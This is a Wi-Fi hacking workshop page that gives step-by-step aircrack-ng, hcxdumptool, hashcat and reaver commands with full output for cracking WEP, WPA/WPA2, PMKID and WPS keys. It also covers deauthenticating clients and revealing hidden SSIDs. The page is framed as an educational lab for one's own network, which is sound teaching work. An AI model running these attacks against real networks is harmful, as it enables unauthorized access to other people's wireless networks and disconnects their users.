--- tags: 'workshop' --- Wi-Fi Hacking Lab === <i class="fa fa-file-pdf-o" aria-hidden="true"></i> **Wi-Fi Hacking Lab** <i class="fa fa-user-circle-o" aria-hidden="true"></i> Johnny Pan <i class="fa fa-clock-o" aria-hidden="true"></i> 2022-10-08 <i class="fa fa-external-link" aria-hidden="true"></i> :::info This lab was created for educational purposes and thinking to improve and to audit the security of the following wireless networks: - Wired equivalent privacy (WEP) - Wi-Fi Protected Access (WPA) - Wi-Fi Protected Access v2 (WPA2) ::: :::danger Do it in your own wireless network. ::: [TOC] ## Wireless hacking concepts - WEP - WPA - WPA2 - Monitor Mode - Promiscous Mode - Packet Injection - 4-way handshake - [EAPOL](https://vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/) ## Requirements - Wi-Fi AP/Router - Wi-Fi Adapter - Aircrack-NG suite - Linux OS ## Hacking WEP ### Changing to root user ```bash! [codeskill@wireless ~]$ sudo su ``` ### Identifying the wireless adapter ```bash! [root@wireless ~]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off ``` ### Enabling monitor mode **Option #1 - Using ifconfig** ```bash! [root@wireless ~]# ifconfig wlan0 down [root@wireless ~]# iwconfig wlan0 mode monitor [root@wireless ~]# ifconfig wlan0 up ``` **Option #2 - Using Airmong-ng** ```bash! [root@wireless ~]# airmon-ng check wlan0 Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 494 NetworkManager 1944 wpa_supplicant ``` ```bash! [root@wireless ~]# airmon-ng check kill Killing these processes: PID Name 1944 wpa_supplicant ``` ```bash! [root@wireless ~]# airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) ``` ```bash! [root@wireless ~]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off ``` ### Changing MAC address ```bash! [root@wireless ~]# ifconfig wlan0 down [root@wireless ~]# iwconfig wlan0 mode monitor [root@wireless ~]# macchanger -r wlan0 [root@wireless ~]# ifconfig wlan0 up ``` ### Selecting WEP encrypted SSID ```bash! [root@wireless ~]# airodump-ng wlan0mon --encrypt wep CH 6 ][ Elapsed: 48 s ][ 2022-10-09 23:59 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -40 26 0 0 11 54e WEP WEP OPENSOURCE ``` ### Packet injection ```bash! [root@wireless ~]# besside-ng wlan0mon -c 6 -b 00:18:39:E4:61:28 [00:21:02] Let's ride [00:21:02] Resuming from besside.log [00:21:02] Appending to wpa.cap [00:21:02] Appending to wep.cap [00:21:02] Logging to besside.log [00:21:02] | Scanning chan 06 [00:21:02] / Scanning chan 06 [00:21:02] / Attacking [OPENSOURCE] WEP - PING [00:21:02] - Attacking [OPENSOURCE] WEP - PING ... [00:21:03] Associated to OPENSOURCE AID [1] [00:21:03] - Attacking [OPENSOURCE] WEP - GET REPLAY [00:21:03] | Attacking [OPENSOURCE] WEP - GET REPLAY [00:21:03] / Attacking [OPENSOURCE] WEP - GET REPLAY ... [00:21:42] \ Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142 [00:21:42] | Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142 [00:21:42] / Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142 ... [00:23:18] - Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56 [00:23:18] \ Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56 [00:23:18] | Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56 ... [00:42:56] | Attacking [OPENSOURCE] WEP - FLOOD - 44989 IVs rate 94 [193 PPS out] len 64 [00:42:56] \ Attacking [OPENSOURCE] WEP - FLOOD - 44999 IVs rate 94 [193 PPS out] len 64 [00:42:56] / Attacking [OPENSOURCE] WEP - FLOOD cracking - 45005 IVs rate 94 [193 PPS out] len 64 [00:42:56] Got key for OPENSOURCE [bf:53:9e:db:37] 45008 IVs [00:42:56] Pwned network OPENSOURCE in 8:58 mins:sec [00:42:56] TO-OWN [] OWNED [OPENSOURCE] [00:42:56] All neighbors owned ``` ### Cracking wep.cap file ```bash [root@wireless ~]# aircrack-ng ./wep.cap Aircrack-ng 1.7 [00:00:01] Tested 67097 keys (got 45009 IVs) KB depth byte(vote) 0 0/ 1 BF(66560) D6(54272) 70(53504) 71(52480) 06(51968) 92(51968) C3(51200) 14(50944) 25(50944) 33(50688) EA(50688) 66(50432) 72(50176) C4(50176) 10(49920) 1 0/ 35 53(60160) 7E(53504) EE(53504) 0D(53248) 7F(52992) E2(52736) B9(52480) F0(52224) 03(51456) 18(51456) 8D(50944) F1(50944) D5(50688) 94(50432) BC(50432) 2 0/ 3 9E(65792) 52(57088) 95(54528) C3(53248) B8(52992) 41(52480) 03(51712) CB(51712) CE(51712) 9F(51200) 0B(50944) 14(50944) 4B(50944) BE(50944) BA(50688) 3 0/ 3 DB(65024) 23(57088) A6(54272) 62(52992) 3B(51968) 43(51712) 60(51712) AB(51712) B1(51712) 85(51456) B6(51456) BC(51200) CD(51200) 09(50944) C7(50944) 4 206/214 AC(41984) 44(41728) 47(41728) 52(41728) 8F(41728) 95(41728) B5(41728) C2(41728) CD(41728) ED(41728) 45(41472) 88(41472) B0(41472) DD(41472) FD(41472) KEY FOUND! [ BF:53:9E:DB:37 ] Decrypted correctly: 100% ``` ## Hacking WPA/WPA2 ### Changing to root user ```bash! [codeskill@wireless ~]$ sudo su ``` ### Identifying the wireless adapter ```bash! [root@wireless ~]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off ``` ### Enabling monitor mode **Option #1 - Using ifconfig** ```bash! [root@wireless ~]# ifconfig wlan0 down [root@wireless ~]# iwconfig wlan0 mode monitor [root@wireless ~]# ifconfig wlan0 up ``` **Option #2 - Using Airmong-ng** ```bash! [root@wireless ~]# airmon-ng check wlan0 Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 494 NetworkManager 1944 wpa_supplicant ``` ```bash! [root@wireless ~]# airmon-ng check kill Killing these processes: PID Name 1944 wpa_supplicant ``` ```bash! [root@wireless ~]# airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0) ``` ```bash! [root@wireless ~]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off ``` ### Changing MAC address ```bash! [root@wireless ~]# ifconfig wlan0 down [root@wireless ~]# iwconfig wlan0 mode monitor [root@wireless ~]# macchanger -r wlan0 [root@wireless ~]# ifconfig wlan0 up ``` ### Selecting WPA/WPA2 encrypted SSID ```bash [root@wireless ~]# airodump-ng wlan0mon CH 13 ][ Elapsed: 1 min ][ 2022-10-10 23:03 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -50 41 6 0 6 54e WPA2 CCMP PSK OPENSOURCE BE:A7:B9:14:DB:98 -57 40 0 0 6 130 WPA2 CCMP PSK ARTEMIS BA:A7:B9:14:DB:98 -54 41 0 0 6 130 WPA2 CCMP PSK NARUTO B6:A7:B9:14:DB:98 -57 42 0 0 6 130 WPA2 CCMP PSK TOTORO B0:A7:B9:14:DB:98 -57 39 0 0 6 130 WPA2 CCMP PSK YOSHI 62:AF:97:C2:4E:24 -33 37 0 0 6 130 WPA2 CCMP PSK ARTEMIS 5E:AF:97:C2:4E:24 -33 40 0 0 6 130 WPA2 CCMP PSK NARUTO 5A:AF:97:C2:4E:24 -34 41 0 0 6 130 WPA2 CCMP PSK TOTORO 54:AF:97:C2:4E:24 -33 42 0 0 6 130 WPA2 CCMP PSK YOSHI BSSID STATION PWR Rate Lost Frames Notes Probes 00:18:39:E4:61:28 16:41:DA:4E:36:EA -31 0 - 1e 0 23 ``` ### Monitor the network for a handshake We press **`Ctrl+C`** and review the list of SSIDs. We look for the one we are interested in auditing. In this case we are going to work with ==OPENSOURCE==. A `handshake` occurs when an item connects to a network (e.g., when your computer connects to a router). You need to wait until a handshake occurs so you capture the data necessary to crack the password. To start monitoring, run the following command: **airodump --channel ==<CHANNEL>== --bssid ==<MAC-AP>== -w ==<CAPTURE-FILE>== wlan0mon** In our case the values are the following: **CHANNEL** = 6 **MAC-AP** = 00:18:39:E4:61:28 **CAPTURE-FILE** = wpa2 As long as this command stays running, you'll be monitoring for all connections and new handshakes. ```bash [root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon CH 6 ][ Elapsed: 0 s ][ 2022-10-10 23:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -51 100 43 1 0 6 54e WPA2 CCMP PSK OPENSOURCE BSSID STATION PWR Rate Lost Frames Notes Probes ``` ### Deauth attack A deauth attack sends deauthentication packets to the router you're trying to break into, causing uses to disconnect and requiring them to log back in. When a user logs back in, you will be provided with a handshake. If you don't do a deauth attack, you might have to wait around for a long time for a handshake to complete, you'll need that handshake to crack the password. If you already see a line with the tag "WPA handshake:" followed by a MAC address in the output of the airodump-ng command, skip this step because you have what you need to crack the password and don't need to send deauth packets. ```bash [root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon CH 6 ][ Elapsed: 1 min ][ 2022-10-10 30:24 ][ WPA handshake: 00:18:39:E4:61:28 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -48 100 690 31 0 6 54e WPA2 CCMP PSK OPENSOURCE BSSID STATION PWR Rate Lost Frames Notes Probes ``` Wait for something to connect to the network. Once you see two **BSSID** addresses appear next to each other one labeled BSSID (the Wi-Fi router) and the other labeled STATION (the computer or other device) this this means a client is connected. To force them into a handshake, you'll now send them deauth packets that kill their connection. ```bash [root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon CH 6 ][ Elapsed: 6 s ][ 2022-10-10 23:38 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -45 100 68 28 6 6 54e WPA2 CCMP PSK OPENSOURCE BSSID STATION PWR Rate Lost Frames Notes Probes 00:18:39:E4:61:28 16:41:DA:4E:36:EA -43 1e- 1e 177 129 EAPOL OPENSOURCE ``` Open a new terminal. Make sure airodump-ng is still running in original terminal window, and drag it to another place on your desktop so both terminals are visible. Send the deauth packets. Run this command, replacing STATION BSSID with the BSSID of the client that connected to the network, and NETWORK BSSID with the router's BSSID: aireplay-ng -0 2 -a STATION BSSID -c NETWORK BSSID mon0. This command will send 2 deauth packets to disconnect the client from the network. Don't try to send more than this sending too many packets could prevent the client from reconnecting and generating the handshake. As long as you're close enough to the target client, they'll be disconnected from the router and forced to reconnect with a handshake. If this doesn't work, move closer to the client. As soon as the client reconnects, all of the information you'll need to crack the password will be available. ```bash [root@wireless ~]# aireplay-ng -0 2 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon 23:47:41 Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6 23:47:41 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|53 ACKs] 23:47:42 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|57 ACKs] ``` ### Cracking wpa2.cap file When you see ==WPA handshake: <AP MAC ADDRESS>==, you can cracking the password. ```bash [root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon CH 6 ][ Elapsed: 5 mins ][ 2022-10-10 23:52 ][ WPA handshake: 00:18:39:E4:61:28 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -49 100 3257 26 0 6 54e WPA2 CCMP PSK OPENSOURCE BSSID STATION PWR Rate Lost Frames Notes Probes ``` In the original terminal window, press Control+C to quit airodump-ng. This stops the dump and saves a file ending with .cap to your desktop. Decompress the rockyou.txt wordlist. To crack the password, you'll need a wordlist. Fortunately, since you're using Kali Linux, you have several already in /usr/share/wordlists. The one we'll want to use is called rockyou.txt, but it's zipped up by default. To unzip it, run gzip -d /usr/share/wordlists/rockyou.txt.gz. You won't be able to crack the password if it's not in the wordlist. You can always try one of the other wordlists if rockyou.txt doesn't crack the password. ```bash apt install wordlists gzip -d /usr/share/wordlists/rockyou.txt.gz ``` Run the command to crack the password. You'll use a tool called aircrack-ng, which come with Kali Linux, to do so. The command is aircrack-ng -a2 -b NETWORK BSSID -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap. Replace NETWORK BSSID with the BSSID for the router. Depending on the strength of the password and the speed of your CPU, this process can take anywhere from a few hours to a few days. If you're cracking static WEP key network instead of a WPA/WPA2-PSK network, replace -a2 with -a1. ```bash [root@wireless ~]# aircrack-ng -a2 -b 00:18:39:E4:61:28 -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap Aircrack-ng 1.7 [00:00:00] 2171/10303727 keys tested (5462.94 k/s) Time left: 31 minutes, 25 seconds 0.02% KEY FOUND! [ qwerty123 ] Master Key : 2C 08 85 AD 79 69 79 A6 8E 1D A2 C3 87 5A 2F 16 92 5F F4 87 E0 57 41 9C 27 CC AB 24 F2 29 49 4E Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EAPOL HMAC : DF BB 43 33 70 11 D9 CB D3 F6 12 FF 42 BE CB 9A ``` ## Hacking PMKID ### Installing the needed tools ```bash! [root@wireless ~]# apt install hcxdumptool [root@wireless ~]# apt install hcxtools ``` ### Capturing PMKID packages ```bash [root@wireless ~]# hcxdumptool -i wlan0 -o test.pcapng --enable_status=1 initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)... interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls start capturing (stop with ctrl+c) NMEA 0183 SENTENCE........: N/A PHYSICAL INTERFACE........: phy3 INTERFACE NAME............: wlan0 INTERFACE PROTOCOL........: IEEE 802.11 INTERFACE TX POWER........: 20 dBm (lowest value reported by the device) INTERFACE HARDWARE MAC....: 00c0cab1a5fc (not used for the attack) INTERFACE VIRTUAL MAC.....: 00c0cab1a5fc (not used for the attack) DRIVER....................: mt76x2u DRIVER VERSION............: 5.18.0-kali7-amd64 DRIVER FIRMWARE VERSION...: 0.0.00-b1 openSSL version...........: 1.0 ERRORMAX..................: 100 errors BPF code blocks...........: 0 FILTERLIST ACCESS POINT...: 0 entries FILTERLIST CLIENT.........: 0 entries FILTERMODE................: unused WEAK CANDIDATE............: 12345678 ESSID list................: 0 entries ACCESS POINT (ROGUE)......: a468bcb13022 (BROADCAST WILDCARD used for the attack) ACCESS POINT (ROGUE)......: a468bcb13023 (BROADCAST OPEN used for the attack) ACCESS POINT (ROGUE)......: a468bcb13024 (used for the attack and incremented on every new client) CLIENT (ROGUE)............: d85dfb0ab897 EAPOLTIMEOUT..............: 20000 usec EAPOLEAPTIMEOUT...........: 2500000 usec REPLAYCOUNT...............: 63589 ANONCE....................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146 SNONCE....................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7 TIME FREQ/CH MAC_DEST MAC_SOURCE ESSID [FRAME TYPE] 01:11:31 2442/7 6872c30f193c 54af97c24e24 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4232 RC:63589 KDV:2] 01:11:47 2462/11 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:6305 RC:63589 KDV:2] 01:13:50 2412/1 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4445 RC:63589 KDV:2] 01:13:54 2417/2 94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1563 RC:63589 KDV:2] 01:13:56 2422/3 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:840 RC:63589 KDV:2] 01:14:00 2427/4 6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4187 RC:63589 KDV:2] 01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3132 RC:63589 KDV:2] 01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:1575 RC:63589 KDV:2] 01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:2548 RC:63589 KDV:2] 01:14:05 2432/5 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:5387 RC:63589 KDV:2] 01:14:08 2437/6 94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1818 RC:63589 KDV:2] 01:14:17 2447/8 a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3958 RC:63589 KDV:2] 01:16:17 5805/161 a86daa1620a1 54af97c24e25 SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4022 RC:63589 KDV:2] 01:16:19 5805/161 1c4d660367fb 6aaf97c24e25 ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:2319 RC:63589 KDV:2] ``` ### Converting PCAP file to Hashcat file ```bash [root@wireless ~]# hcxpcapngtool -E essidlist -I identitylist -U usernamelist -o test.22000 test.pcapng hcxpcapngtool 6.2.7 reading from test.pcapng... summary capture file -------------------- file name................................: test.pcapng version (pcapng).........................: 1.0 operating system.........................: Linux 5.18.0-kali7-amd64 application..............................: hcxdumptool 6.2.6 interface name...........................: wlan0 interface vendor.........................: 00c0ca openSSL version..........................: 1.0 weak candidate...........................: 12345678 MAC ACCESS POINT.........................: a468bcb13024 (incremented on every new client) MAC CLIENT...............................: d85dfb0ab897 REPLAYCOUNT..............................: 63589 ANONCE...................................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146 SNONCE...................................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7 timestamp minimum (GMT)..................: 14.10.2022 01:11:07 timestamp maximum (GMT)..................: 14.10.2022 01:23:11 used capture interfaces..................: 1 link layer header type...................: DLT_IEEE802_11_RADIO (127) endianness (capture system)...............: little endian packets inside...........................: 3780 packets received on 2.4 GHz..............: 1637 packets received on 5 GHz................: 1754 ESSID (total unique).....................: 67 BEACON (total)...........................: 79 BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 8 9 10 11 BEACON on 5/6 GHz channel (from IE-TAG)..: 36 40 44 48 149 161 BEACON (SSID wildcard/unset).............: 4 BEACON (SSID zeroed).....................: 2 ACTION (total)...........................: 33 ACTION (containing ESSID)................: 31 PROBEREQUEST.............................: 17 PROBEREQUEST (directed)..................: 2 PROBERESPONSE (total)....................: 59 AUTHENTICATION (total)...................: 75 AUTHENTICATION (OPEN SYSTEM).............: 75 ASSOCIATIONREQUEST (total)...............: 19 ASSOCIATIONREQUEST (PSK).................: 17 REASSOCIATIONREQUEST (total).............: 2 REASSOCIATIONREQUEST (PSK)...............: 2 EAPOL messages (total)...................: 3435 EAPOL RSN messages.......................: 3435 EAPOLTIME gap (measured maximum usec)....: 1479862 EAPOL ANONCE error corrections (NC)......: working REPLAYCOUNT gap (suggested NC)...........: 2 EAPOL M1 messages (total)................: 2581 EAPOL M2 messages (total)................: 810 EAPOL M3 messages (total)................: 22 EAPOL M4 messages (total)................: 22 EAPOL pairs (total)......................: 8526 EAPOL pairs (best).......................: 17 EAPOL ROGUE pairs........................: 11 EAPOL pairs written to 22000 hash file...: 17 (RC checked) EAPOL M12E2 (challenge)..................: 12 EAPOL M32E2 (authorized).................: 5 PMKID (useless)..........................: 40 PMKID (total)............................: 160 PMKID (best).............................: 6 PMKID ROGUE..............................: 5 PMKID written to 22000 hash file.........: 6 malformed packets (total)................: 3 BEACON error (total malformed packets)...: 3 frequency statistics from radiotap header (frequency: received packets) ----------------------------------------------------------------------- 2412: 275 2417: 180 2422: 55 2427: 181 2432: 92 2437: 100 2442: 11 2447: 92 2452: 302 2457: 76 2462: 224 2467: 48 2472: 1 5180: 1220 5200: 3 5220: 164 5240: 139 5745: 1 5765: 71 5785: 59 5805: 95 5825: 2 session summary --------------- processed pcapng files................: 1 ``` ### Cracking PMKID ```bash= hashcat -m 22000 test.22000 -a 0 --kernel-accel=1 -w 4 --force '/usr/share/wordlists/rockyou.txt' Session..........: hashcat Status...........: Running Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL) Hash.Target......: test.22000 Time.Started.....: Fri Oct 14 01:36:27 2022, (5 mins, 54 secs) Time.Estimated...: Tue Oct 18 11:29:14 2022, (4 days, 9 hours) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 488 H/s (0.94ms) @ Accel:1 Loops:1024 Thr:1 Vec:8 Recovered........: 0/23 (0.00%) Digests (total), 0/23 (0.00%) Digests (new), 0/13 (0.00%) Salts Progress.........: 496666/186477005 (0.27%) Rejected.........: 332644/496666 (66.98%) Restore.Point....: 38204/14344385 (0.27%) Restore.Sub.#1...: Salt:7 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: september30 -> september22 [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => ``` ## Hacking WPS ```bash wash -i wlan0mon BSSID Ch dBm WPS Lck Vendor ESSID -------------------------------------------------------------------------------- 00:22:75:E2:8C:2A 1 -50 1.0 No RalinkTe OPENSOURCE ``` ```bash reaver -i wlan0mon -b 00:22:75:E2:8C:2A -d 30 -S -N -vv Reaver v1.6.6 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [+] Waiting for beacon from 00:22:75:E2:8C:2A [+] Switching wlan0mon to channel 1 [+] Received beacon from 00:22:75:E2:8C:2A [+] Vendor: RalinkTe [+] Trying pin "12345670" [+] Sending authentication request [+] Sending association request [+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Received M1 message [+] Received M1 message [+] Received M3 message [+] Sending M4 message [+] Received M3 message [+] Received M3 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin "00005678" [+] Sending authentication request [+] Sending association request [+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE) [+] Sending EAPOL START request ``` ```bash [root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -p 19806716 -vv ``` ## How to discover hidden SSID ```bash [root@wireless ~]# airodump-ng wlan0mon CH 7 ][ Elapsed: 12 s ][ 2022-10-11 22:42 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -40 7 0 0 6 54e WPA2 CCMP PSK <length: 10> 62:AF:97:C2:4E:24 -34 7 0 0 6 130 WPA2 CCMP PSK ARTEMIS 5E:AF:97:C2:4E:24 -33 7 0 0 6 130 WPA2 CCMP PSK NARUTO 5A:AF:97:C2:4E:24 -34 9 0 0 6 130 WPA2 CCMP PSK TOTORO 54:AF:97:C2:4E:24 -33 9 0 0 6 130 WPA2 CCMP PSK YOSHI ``` <length: 10> Capture packages ```bash [root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w hidden-ssid wlan0mon CH 6 ][ Elapsed: 24 s ][ 2022-10-11 22:51 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -43 100 265 0 0 6 54e WPA2 CCMP PSK <length: 10> BSSID STATION PWR Rate Lost Frames Notes Probes ``` ```bash [root@wireless ~]# tshark -r hidden-ssid-01.cap "wlan.ta == 00:18:39:E4:61:28" Running as user "root" and group "root". This could be dangerous. 2 0.055007 Cisco-Li_e4:61:28 → Broadcast 802.11 138 Beacon frame, SN=3347, FN=0, Flags=........, BI=100, SSID=\000\000\000\000\000\000\000\000\000\000 ``` Open Wireshark wlan.ta==00:18:39:E4:61:28 ![](https://i.imgur.com/MSYPLeg.png) ```bash [root@wireless ~]# aireplay-ng -0 10 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon 23:04:51 Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6 23:04:52 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs] 23:04:52 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [118|118 ACKs] 23:04:53 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs] 23:04:53 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs] 23:04:54 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [116|116 ACKs] 23:04:55 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs] 23:04:55 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [114|114 ACKs] 23:04:56 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [94|94 ACKs] 23:04:56 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [143|143 ACKs] 23:04:57 Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [111|111 ACKs] ``` ```bash CH 6 ][ Elapsed: 6 s ][ 2022-10-11 23:38 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:18:39:E4:61:28 -45 100 68 28 6 6 54e WPA2 CCMP PSK OPENSOURCE BSSID STATION PWR Rate Lost Frames Notes Probes 00:18:39:E4:61:28 16:41:DA:4E:36:EA -43 1e- 1e 177 129 EAPOL OPENSOURCE ``` ## MAC Address Vendors You can use the following link to identified the MAC address vendor https://macvendors.com/ Or using the following command on Kali ```bash! [root@wireless ~]# grep -i <FIRST 6 CHARS OF MAC ADDRESS> /var/lib/ieee-data/oui.txt ``` ## Restore the services ```bash! [root@wireless ~]# systemctl start NetworkManager.service [root@wireless ~]# systemctl start wpa_supplicant.service ``` ## References - https://www.aircrack-ng.org/ - https://www.youtube.com/watch?v=knllpZF508k - https://www.youtube.com/watch?v=_OyJ62fP648 - https://www.yeahhub.com/bypass-hidden-ssid-wireless-network-full-proof-method/
Last changed by  
Johnny Pan
480

Read more

Buffer Overflow Workshop

<i class="fa fa-file-pdf-o" aria-hidden="true"></i> Docker como herramienta de entrenamiento y hacking + Labs<i class="fa fa-user-circle-o" aria-hidden="true"></i> Johnny Pan (codeskill)<i class="fa fa-user-circle-o" aria-hidden="true"></i> Fabian Quesada (rocketman)<i class="fa fa-clock-o" aria-hidden="true"></i> 2023-11-04

11/29/2023
Docker Notes

<i class="fa fa-file-pdf-o" aria-hidden="true"></i> Docker Notes<i class="fa fa-user-circle-o" aria-hidden="true"></i> Johnny Pan (codeskill)<i class="fa fa-clock-o" aria-hidden="true"></i> 2020-09-08

10/10/2023
ctf.synk.io

ctf.synk.io Johnny Pan 2021-10-05 https://ctf.snyk.io [TOC] magician Analizamos que tipo de hash es

10/8/2021
Brixel CTF Winter Edition

:::info @codeskill 2020-12-26 https://ctf.brixel.space/ ::: [TOC] Programming Are you fast enough?

1/12/2021
Read more from Johnny Pan
Published on HackMD